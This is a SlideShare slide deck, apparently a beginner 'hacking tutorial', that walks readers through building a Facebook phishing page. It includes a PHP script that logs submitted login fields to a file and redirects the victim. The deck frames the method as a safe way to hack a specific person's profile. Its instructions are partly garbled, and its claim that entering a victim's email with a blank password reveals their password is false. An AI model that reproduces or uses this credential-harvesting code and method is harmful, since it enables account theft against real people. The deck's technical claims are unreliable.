SlideShare a Scribd company logo
1 of 11
Hamza Shahid Mirza – Certified Ethical Hacker
Please note that this tutorial is for educational purposes only. If you learn
anything from it, please do not use it for malicious attacks or any other type of
illegal activity.
If you already to know how to hack using the real programming and hacking
techniques then please don’t use them as you will get traced by the cyber security
almost instantly and it can get you in a lot of trouble.
Hacking is the art of exploiting computers to get access to otherwise unauthorised
information. Now that the world is using IT systems to gather, store and manipulate
important information there is also a need to make sure that data is secure. However, no
system is without its problems.
There are 3 types of hackers…White hat hackers, grey hat hackers and black hat hackers.
A white hat hacker breaks security for non-malicious reasons, perhaps to test their own security
system or while working for a security company which makes security software.The term "white hat"
in Internet slang refers to an ethical hacker.
A black hat hacker is a hacker who "violates computer security for little reason beyond maliciousness
or for personal gain". Black hat hackers form the stereotypical, illegal hacking groups often portrayed
in popular culture, and are "the epitome of all that the public fears in a computer criminal".[10] Black
hat hackers break into secure networks to destroy data or make the network unusable for those who
are authorized to use the network.
A grey hat hacker is a combination of a black hat and a white hat hacker. A grey hat hacker may
surf the internet and hack into a computer system for the sole purpose of notifying the
administrator that their system has a security defect, for example.They may then offer to correct
the defect for a fee.
Here you will learn how to hack without having any knowledge of programming. In other
words, you will learn to hack using “Phishing technique”.
Phishing is the method for hacking passwords. It makes the use of Fake Login Pages, also
known as spoofed pages.These fake login pages resemble the original login pages of sites
like Yahoo, Gmail, paypal, ebay and Facebook etc.
The victim is fooled to believe the fake facebook page to be the real one and enter his/her
password. But once the user attempts to login through these pages, his/her facebook login
details are stolen away.
It is a very basic technique and it doesn’t require any knowledge of programming. I’ve
already written a code that you are going to need so just follow the steps and you’ll be able
to call yourself a ‘hacker’.
Go to the normal facebook login page which is www.facebook.com
Right click on the page and click ‘View page source’.
This page will open in a new tab when you click ‘View page source’.
Press ‘Ctrl + A’ to select everything on the page and the ‘Ctrl + C’ to copy.
Open Notepad on your computer and paste the page that you copied by pressing ‘Ctrl +V’
Now click ‘Edit’ on the top left corner of the notepad and click the ‘Find’ option and the
‘Find box’ will open up.Type ‘action’ in the ‘Find what’ bar and click ‘Find next’ until you
find “action = http://www.facebook.com/login.php?”. Now select ‘action’ and change it
to ‘post’. So that’s what it should end up looking like: “post = =
http://www.facebook.com/login.php?”.
When you’re done, save it as login.html.
Now open a new notepad file and type this code there:
<?php
header ('Location:http://www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?
This is the hacking code that I’ve written. Save it as code.php.
Now the final step is to create a phishing website. Go to 000webhosting.com (ooo is 3
zero’s).And sign up by creating a create a subdomain.
For example, www.mynewwebsite.com.
Now go to your file manage on the homepage on the website and upload the 2 files that
you saved on your notepad. i.e. Login.html and code.php.
You must know the email address of the person you’re going to hack. Now try to login with
their email address and leave the password section blank. Once you’ve done it, their email
and passsword will be shown on your filemanager on the phishing website that you just
created.
It’s a very basic and safe technique to hack someone’s profile. Hacking someone anonymously takes a
lot of programming skills and time. So that’s why I’ve shown you this technique because a lot of
people wonder ‘how to hack’.

More Related Content

Viewers also liked

Guitar lesson
Guitar lessonGuitar lesson
Guitar lessonizisiz
 
TYPES OF HACKING
TYPES OF HACKINGTYPES OF HACKING
TYPES OF HACKINGSHERALI445
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical HackingNeel Kamal
 
Computer Hacking - An Introduction
Computer Hacking - An IntroductionComputer Hacking - An Introduction
Computer Hacking - An IntroductionJayaseelan Vejayon
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern timesjeshin jose
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its typesSai Sakoji
 
Paging and Segmentation in Operating System
Paging and Segmentation in Operating SystemPaging and Segmentation in Operating System
Paging and Segmentation in Operating SystemRaj Mohan
 
Page replacement algorithms
Page replacement algorithmsPage replacement algorithms
Page replacement algorithmsPiyush Rochwani
 

Viewers also liked (12)

Guitar lesson
Guitar lessonGuitar lesson
Guitar lesson
 
Page Replacement
Page ReplacementPage Replacement
Page Replacement
 
Paging and segmentation
Paging and segmentationPaging and segmentation
Paging and segmentation
 
Hacking
HackingHacking
Hacking
 
TYPES OF HACKING
TYPES OF HACKINGTYPES OF HACKING
TYPES OF HACKING
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
Computer Hacking - An Introduction
Computer Hacking - An IntroductionComputer Hacking - An Introduction
Computer Hacking - An Introduction
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern times
 
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its types
 
Paging and Segmentation in Operating System
Paging and Segmentation in Operating SystemPaging and Segmentation in Operating System
Paging and Segmentation in Operating System
 
Page replacement algorithms
Page replacement algorithmsPage replacement algorithms
Page replacement algorithms
 

Similar to Hacking tutorial. (20)

Phishing attack
Phishing attackPhishing attack
Phishing attack
 
Introduction to Hacking
Introduction to HackingIntroduction to Hacking
Introduction to Hacking
 
Basic ethical hacking for seminar presentation
Basic ethical hacking for seminar presentationBasic ethical hacking for seminar presentation
Basic ethical hacking for seminar presentation
 
A presentation on Phishing
A presentation on PhishingA presentation on Phishing
A presentation on Phishing
 
Ethical hacking for Business or Management.pptx
Ethical hacking for Business or Management.pptxEthical hacking for Business or Management.pptx
Ethical hacking for Business or Management.pptx
 
Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)
 
Hacking & Hackers
Hacking & HackersHacking & Hackers
Hacking & Hackers
 
Ethical hacking 2016
Ethical hacking  2016 Ethical hacking  2016
Ethical hacking 2016
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Hacking
HackingHacking
Hacking
 
Kinds of hackers
Kinds of hackersKinds of hackers
Kinds of hackers
 
Information Security and Ethical Hacking
Information Security and Ethical HackingInformation Security and Ethical Hacking
Information Security and Ethical Hacking
 
Ethical hacking (2)
Ethical hacking (2)Ethical hacking (2)
Ethical hacking (2)
 
All About Hacking..!!
All About Hacking..!!All About Hacking..!!
All About Hacking..!!
 
All About Hacking.!!
All About Hacking.!! All About Hacking.!!
All About Hacking.!!
 
Ethical Hacking & Network Security
Ethical Hacking & Network Security Ethical Hacking & Network Security
Ethical Hacking & Network Security
 
10.a guide-to-facebook-security
10.a guide-to-facebook-security10.a guide-to-facebook-security
10.a guide-to-facebook-security
 
Hacking
HackingHacking
Hacking
 
Hacking
HackingHacking
Hacking
 

More from Ham'zzah Mir-zza (20)

Get started with hacking
Get started with hackingGet started with hacking
Get started with hacking
 
Activating windows 7 without actually buying the license key
Activating windows 7 without actually buying the license keyActivating windows 7 without actually buying the license key
Activating windows 7 without actually buying the license key
 
Hacking with a keylogger.
Hacking with a keylogger.Hacking with a keylogger.
Hacking with a keylogger.
 
E6 logo Animation
E6 logo Animation E6 logo Animation
E6 logo Animation
 
Ethical Checklist
Ethical Checklist Ethical Checklist
Ethical Checklist
 
Ethical Checklist
Ethical Checklist Ethical Checklist
Ethical Checklist
 
Ethical Checklist - E6 3D Logo
Ethical Checklist - E6 3D LogoEthical Checklist - E6 3D Logo
Ethical Checklist - E6 3D Logo
 
Production
ProductionProduction
Production
 
Final schedule 1
Final schedule 1Final schedule 1
Final schedule 1
 
Final schedule
Final scheduleFinal schedule
Final schedule
 
Final production log
Final production logFinal production log
Final production log
 
Fmp research1
Fmp research1Fmp research1
Fmp research1
 
3 d animation
3 d animation3 d animation
3 d animation
 
Gd02 collaboration agreement
Gd02 collaboration agreementGd02 collaboration agreement
Gd02 collaboration agreement
 
Project Charter
Project CharterProject Charter
Project Charter
 
Gd02 ethical checklist (1)
Gd02 ethical checklist (1)Gd02 ethical checklist (1)
Gd02 ethical checklist (1)
 
Pixel and resolution
Pixel and resolutionPixel and resolution
Pixel and resolution
 
Review
ReviewReview
Review
 
Figurative artists
Figurative artistsFigurative artists
Figurative artists
 
Fmp research1
Fmp research1Fmp research1
Fmp research1
 

Recently uploaded

Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Disha Kariya
 
Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationnomboosow
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphThiyagu K
 
Measures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDMeasures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDThiyagu K
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsTechSoup
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfsanyamsingh5019
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactPECB
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfchloefrazer622
 
Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Celine George
 
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions  for the students and aspirants of Chemistry12th.pptxOrganic Name Reactions  for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptxVS Mahajan Coaching Centre
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfciinovamais
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityGeoBlogs
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)eniolaolutunde
 
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...anjaliyadav012327
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13Steve Thomason
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introductionMaksud Ahmed
 
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxPOINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxSayali Powar
 

Recently uploaded (20)

Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
 
Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..
 
Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communication
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot Graph
 
Measures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDMeasures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SD
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The Basics
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdf
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdf
 
Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17
 
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions  for the students and aspirants of Chemistry12th.pptxOrganic Name Reactions  for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activity
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)
 
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13
 
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxPOINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
 

Hacking tutorial.

  • 1. Hamza Shahid Mirza – Certified Ethical Hacker Please note that this tutorial is for educational purposes only. If you learn anything from it, please do not use it for malicious attacks or any other type of illegal activity. If you already to know how to hack using the real programming and hacking techniques then please don’t use them as you will get traced by the cyber security almost instantly and it can get you in a lot of trouble.
  • 2. Hacking is the art of exploiting computers to get access to otherwise unauthorised information. Now that the world is using IT systems to gather, store and manipulate important information there is also a need to make sure that data is secure. However, no system is without its problems.
  • 3. There are 3 types of hackers…White hat hackers, grey hat hackers and black hat hackers. A white hat hacker breaks security for non-malicious reasons, perhaps to test their own security system or while working for a security company which makes security software.The term "white hat" in Internet slang refers to an ethical hacker. A black hat hacker is a hacker who "violates computer security for little reason beyond maliciousness or for personal gain". Black hat hackers form the stereotypical, illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal".[10] Black hat hackers break into secure networks to destroy data or make the network unusable for those who are authorized to use the network. A grey hat hacker is a combination of a black hat and a white hat hacker. A grey hat hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has a security defect, for example.They may then offer to correct the defect for a fee.
  • 4. Here you will learn how to hack without having any knowledge of programming. In other words, you will learn to hack using “Phishing technique”. Phishing is the method for hacking passwords. It makes the use of Fake Login Pages, also known as spoofed pages.These fake login pages resemble the original login pages of sites like Yahoo, Gmail, paypal, ebay and Facebook etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. It is a very basic technique and it doesn’t require any knowledge of programming. I’ve already written a code that you are going to need so just follow the steps and you’ll be able to call yourself a ‘hacker’.
  • 5. Go to the normal facebook login page which is www.facebook.com Right click on the page and click ‘View page source’.
  • 6. This page will open in a new tab when you click ‘View page source’.
  • 7. Press ‘Ctrl + A’ to select everything on the page and the ‘Ctrl + C’ to copy.
  • 8. Open Notepad on your computer and paste the page that you copied by pressing ‘Ctrl +V’
  • 9. Now click ‘Edit’ on the top left corner of the notepad and click the ‘Find’ option and the ‘Find box’ will open up.Type ‘action’ in the ‘Find what’ bar and click ‘Find next’ until you find “action = http://www.facebook.com/login.php?”. Now select ‘action’ and change it to ‘post’. So that’s what it should end up looking like: “post = = http://www.facebook.com/login.php?”.
  • 10. When you’re done, save it as login.html. Now open a new notepad file and type this code there: <?php header ('Location:http://www.facebook.com'); $handle = fopen("usernames.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); } fwrite($handle, "rn"); fclose($handle); exit; ? This is the hacking code that I’ve written. Save it as code.php.
  • 11. Now the final step is to create a phishing website. Go to 000webhosting.com (ooo is 3 zero’s).And sign up by creating a create a subdomain. For example, www.mynewwebsite.com. Now go to your file manage on the homepage on the website and upload the 2 files that you saved on your notepad. i.e. Login.html and code.php. You must know the email address of the person you’re going to hack. Now try to login with their email address and leave the password section blank. Once you’ve done it, their email and passsword will be shown on your filemanager on the phishing website that you just created. It’s a very basic and safe technique to hack someone’s profile. Hacking someone anonymously takes a lot of programming skills and time. So that’s why I’ve shown you this technique because a lot of people wonder ‘how to hack’.